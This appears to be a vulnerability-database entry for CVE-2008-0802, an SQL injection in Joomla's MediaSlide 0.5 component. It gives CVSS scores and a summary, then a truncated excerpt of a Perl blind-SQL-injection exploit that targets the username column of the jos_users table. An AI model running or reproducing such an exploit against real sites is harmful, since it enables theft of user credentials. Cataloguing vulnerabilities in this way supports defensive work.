7.5
CVSSv2

CVE-2008-0802

Published: 15/02/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in the MediaSlide (com_mediaslide) 0.5 component for Joomla! allows remote malicious users to execute arbitrary SQL commands via the albumnum parameter in a contact action.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

joomla com mediaslide

mediaslide com mediaslide

Exploits

#!/usr/bin/perl #inphex #joomla com_mediaslide blind sql injection use LWP::UserAgent; use LWP::Simple; use Switch; use Digest::MD5 qw(md5 md5_hex md5_base64); print "usage: $0 -h hostcom -p /\n"; ### use Getopt::Long; ### $column = "username"; $table = "jos_users"; $regex = "preview_f2"; %cm_n_ = ("-h" => "host","-p" => "path","-c" => "c ...